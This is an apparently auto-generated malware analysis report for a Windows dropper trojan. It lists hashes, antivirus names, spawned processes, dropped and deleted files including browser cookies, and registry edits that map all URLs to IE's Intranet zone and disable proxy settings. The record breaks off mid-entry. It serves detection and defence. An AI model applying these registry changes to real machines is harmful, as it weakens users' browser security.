Gen.Trojan.Heur.Dropper.hmGfamxW9Ncb_01a6ec54d2

by malwarelabrobot on September 26th, 2016 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Trojan.Heur.Dropper.hmGfamxW9Ncb (B) (Emsisoft), Gen:Trojan.Heur.Dropper.hmGfamxW9Ncb (AdAware), Trojan.Win32.Swrort.3.FD, PUPHomePages.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, PUP


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 01a6ec54d2ba5e3611ef733ea2747189
SHA1: 2b9e5534a15de090d0e42a199048facac2887052
SHA256: 8eace449341619f902191cdc9dec971c6b3164c8a992b188152062fc0669fc98
SSDeep: 3072:rpdtP1lmEyLL6iAlpJEdULhfTRJ0mNZyV29kxFwsvDctoutU:r9Xm365lpKQB1JjHyV290FwsrctoSU
Size: 117248 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2013-02-28 06:07:37
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

regsvr32.exe:1760
regsvr32.exe:2020
regsvr32.exe:1412
sc.exe:1164
sc.exe:896

The Trojan injects its code into the following process(es):

%original file name%.exe:516

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~2662TXStartUpdateLog.tmp (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\homepro[1].txt (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmpbak (11299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFIC4966.tmp (11385 bytes)
%WinDir%\system\lock.dat (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\exitpop[1].txt (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\remote.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\insert.tmp (2490 bytes)
%WinDir%\win.ini (4626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\newDomain[1].txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBIC753.TMP (17716 bytes)
%WinDir%\lock.log (914 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yxjpq.tmp (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DFA2796.tmp (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\InsertWnd[1].txt (671 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\InsertWnd_enlc[1].dll (19378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\safeen[1].txt (670 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\pubjc[1].txt (21084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA90A3.TMP (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\osm[1].dll (11953 bytes)
%Documents and Settings%\%current user%\Application Data\8901.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\newcor[1].dll (34450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\yxjpq[1].txt (588 bytes)
%System%\lockie.ini (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prosafe.tmp (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA3334.tmp (3383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC626.tmp (8314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jslist.tmp (692 bytes)
%System%\mswinsck.ocx (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~prohome.tmp (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xsend.tmp (37241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (6262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcsaVas32.tmp (58 bytes)
%WinDir%\sys.dat (7212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\jzjc[1].txt (154 bytes)
%System%\gdi30.dll (112 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jslist[1].txt (1405 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tcjk.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\file[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA8273.tmp (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFB3931.tmp (4418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~url.tmp (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\domain.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ic[1].htm (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmp (47412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzjc.tmp (154 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\jzurl[1].txt (1224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (294 bytes)
%System%\drivers\etc\hosts.tmp (2822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\tfgg[1].txt (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\icdata[1].dll (18063 bytes)
%WinDir%\xdrq\lockie.ini (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\eb[1].txt (1721 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (19996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\InsertWnd_2345title_en[1].dll (16223 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\taian[1].ini (1006 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DUs6109.tmp (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\serList[1].txt (1521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\prosafe[1].txt (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eb.tmp (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\serList.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA6871.tmp (11948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzurl.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\urlRemote[1].txt (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4990.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcVas32.tmp (388 bytes)
%WinDir%\Media\ad.ini (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC263.TMP (16428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jzyxj[1].txt (1824 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~2662TXStartUpdateLog.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcVas32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~prohome.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC626.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcsaVas32.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\remote.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmpbak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eb.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jslist.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\8901.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFB3931.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~url.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\domain.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzjc.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prosafe.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (0 bytes)
%System%\drivers\etc\hosts.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[3].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFIC4966.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yxjpq.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tcjk.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\taian[1].ini (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\serList.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzurl.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4990.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%WinDir%\Media\ad.ini (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jzyxj[1].txt (0 bytes)

Registry activity

The process regsvr32.exe:1760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\MSWinsock.Winsock]
"(Default)" = "Microsoft WinSock Control, version 6.0"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32]
"(Default)" = "%System%\mswinsck.ocx, 1"

[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32]
"(Default)" = "%System%\mswinsck.ocx"

[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\1]
"(Default)" = "132497"

[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "IMSWinsockControl"

[HKCR\MSWinsock.Winsock\CLSID]
"(Default)" = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"

[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "Winsock General Property Page Object"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InProcServer32]
"(Default)" = "%System%\mswinsck.ocx"

[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"(Default)" = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"

[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\win32]
"(Default)" = "%System%\mswinsck.ocx"

[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "DMSWinsockControlEvents"

[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID]
"(Default)" = "MSWinsock.Winsock"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InProcServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"Version" = "1.0"
"(Default)" = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID]
"(Default)" = "MSWinsock.Winsock.1"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "Microsoft WinSock Control, version 6.0"

[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0]
"(Default)" = "Microsoft Winsock Control 6.0"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version]
"(Default)" = "1.0"

[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\FLAGS]
"(Default)" = "2"

[HKCR\MSWinsock.Winsock\CurVer]
"(Default)" = "MSWinsock.Winsock.1"

[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E E2 FC 3D B1 95 0B 9F F5 86 FB 43 AB 39 18 38"

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus]
"(Default)" = "0"

[HKCR\MSWinsock.Winsock.1\CLSID]
"(Default)" = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"

[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR]
"(Default)" = ""

[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"(Default)" = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"

[HKCR\MSWinsock.Winsock.1]
"(Default)" = "Microsoft WinSock Control, version 6.0"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}]
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}]

The Trojan deletes the following value(s) in system registry:

[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32]
"ThreadingModel"

The process regsvr32.exe:2020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 12 AF FC 0C 86 99 69 34 4E 30 8D EB 42 B6 C3"

[HKCR\Es58.P2P\Clsid]
"(Default)" = "{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}"

[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0]
"(Default)" = "Es58"

[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA8273.tmp"

[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\TypeLib]
"(Default)" = "{52DAF8C9-8861-47A8-BC17-077666A2342A}"

[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\TypeLib]
"Version" = "1.0"

[HKCR\Es58.P2P]
"(Default)" = "Es58.P2P"

[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\TypeLib]
"(Default)" = "{52DAF8C9-8861-47A8-BC17-077666A2342A}"

[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}]
"(Default)" = "_P2P"

[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}]
"(Default)" = "Es58.P2P"

[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\VERSION]
"(Default)" = "1.0"

[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\ProgID]
"(Default)" = "Es58.P2P"

[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA8273.tmp"

[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

The process regsvr32.exe:1412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\InprocServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA6871.tmp"

[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}\TypeLib]
"Version" = "4f4.0"
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"

[HKCR\yswm.FileIO\Clsid]
"(Default)" = "{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}"

[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\TypeLib]
"Version" = "4f4.0"

[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA6871.tmp"

[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\VERSION]
"(Default)" = "1268.0"

[HKCR\yswm.FileIO]
"(Default)" = "yswm.FileIO"

[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\TypeLib]
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"

[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}]
"(Default)" = "yswm.FileIO"

[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}]
"(Default)" = "_FileIO"

[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\VERSION]
"(Default)" = "1268.0"

[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}]
"(Default)" = "_runsoft"

[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\yswm.runsoft]
"(Default)" = "yswm.runsoft"

[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0]
"(Default)" = "yswm"

[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\TypeLib]
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"

[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\InprocServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA6871.tmp"

[HKCR\yswm.runsoft\Clsid]
"(Default)" = "{B007063B-34E1-4EA4-BC29-11D1AE806386}"

[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\TypeLib]
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"

[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}]
"(Default)" = "yswm.runsoft"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 FF 4A 2F CB 67 23 3E 5B 37 7D E8 C4 22 48 2B"

[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\ProgID]
"(Default)" = "yswm.FileIO"

[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\ProgID]
"(Default)" = "yswm.runsoft"

The process %original file name%.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 E4 2B F3 D7 BE 4E D5 CF B3 F8 F6 17 72 A4 D7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security zone settings so that all local web nodes with no dots in their names, which are not otherwise assigned to any zone, are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sc.exe:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 BA CA A3 C6 4F D5 87 EF 3F 05 22 35 DB EB C4"

The process sc.exe:896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

